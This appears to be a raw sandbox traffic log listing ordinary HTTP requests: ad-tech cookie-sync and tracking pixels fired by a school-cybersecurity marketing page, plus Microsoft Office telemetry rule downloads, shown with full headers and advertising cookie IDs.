Source: global trafficHTTP traffic detected: GET /sync?dsp_id=44&user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel?google_sc&google_nid=artb&google_hm=5GX2sY6jMzQcqH49LoEhuw HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUk0zOnp7KPAX2H7PV04lK3EUODRxZQzvzNUj9mqfajXpAGNwRNeTOLJeNEyKAk
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /j/sendrolling.js HTTP/1.1Host: s.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rum?cm_dsp_id=105&external_user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&expiration=1760433191&C=1 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CMID=ZwzgqEt3uZEAADQEACecaQAA; CMPS=473; CMPRO=473
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive/check?partner_id=3521&partner_device_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1728897192595; TapAd_DID=e3913225-94b4-4b08-9fd3-4285fd980084
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=ff675d27-c17a-4d2e-b7ab-ec29a6304351|1728897158
Source: global trafficHTTP traffic detected: GET /cm/o/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rum?cm_dsp_id=105&external_user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&expiration=1760433191&C=1 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CMID=ZwzgqEt3uZEAADQEACecaQAA; CMPS=473; CMPRO=473
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=e3913225-94b4-4b08-9fd3-4285fd980084%252C%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; TDCPM=CAEYASABKAIyCwigk6rm4o62PRAFOAFaBzFoMXkxYTdgAg..
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cm/g/in HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cm/outbrain/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /sync?dsp_id=44&user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI HTTP/1.1Host: x.bidswitch.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /396846.gif?served_by=evergreen&partner_uid=790d1d18-a5ba-44b9-b204-a432fb8c1174 HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: rlas3=wwR6N7dYyKVT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAASBQjbThADEgYIuOsBECI=
Source: global trafficHTTP traffic detected: GET /cm/pubmatic/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537103138&val=e465f6b18ea333341ca87e3d2e8121bb&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=ff675d27-c17a-4d2e-b7ab-ec29a6304351|1728897158
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=1830&partner_device_id=7d931d72-b6cd-40d8-9aaa-91033ac03d95&ttd_puid=e3913225-94b4-4b08-9fd3-4285fd980084%2C%2C HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1728897192595; TapAd_DID=e3913225-94b4-4b08-9fd3-4285fd980084; TapAd_3WAY_SYNCS=
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /396846.gif?served_by=evergreen&partner_uid=790d1d18-a5ba-44b9-b204-a432fb8c1174 HTTP/1.1Host: idsync.rlcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAASBQjbThADEgYIuOsBECI=; rlas3=wY6GviTw/A1T4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=
Source: global trafficHTTP traffic detected: GET /cookie-sync?p=adroll&uid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=&us_privacy=1--- HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cm/r/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /cm/taboola/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=e465f6b18ea333341ca87e3d2e8121bb-g_1728897194-a_1728897187; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-g_1728897194-a_1728897187
Source: global trafficHTTP traffic detected: GET /cm/g/in HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=e465f6b18ea333341ca87e3d2e8121bb-g_1728897194-a_1728897187; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-g_1728897194-a_1728897187
Source: global trafficHTTP traffic detected: GET /ul_cb/sync?dsp_id=44&user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI HTTP/1.1Host: x.bidswitch.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tuuid=7cc2efa7-b7d9-404c-96f2-39df2008d52f; c=1728897194; tuuid_lu=1728897194
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTMzMDYmdGw9MTI5NjAw&piggybackCookie=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=BOOoKswOOoKswA2ABBENAkwAAAAXyACACYAIIA HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537103138&val=e465f6b18ea333341ca87e3d2e8121bb&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=ff675d27-c17a-4d2e-b7ab-ec29a6304351|1728897158
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=1830&partner_device_id=7d931d72-b6cd-40d8-9aaa-91033ac03d95&ttd_puid=e3913225-94b4-4b08-9fd3-4285fd980084%2C%2C HTTP/1.1Host: pixel.tapad.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1728897192595; TapAd_DID=e3913225-94b4-4b08-9fd3-4285fd980084; TapAd_3WAY_SYNCS=1!6921
Source: global trafficHTTP traffic detected: GET /cm/triplelift/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cm/x/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
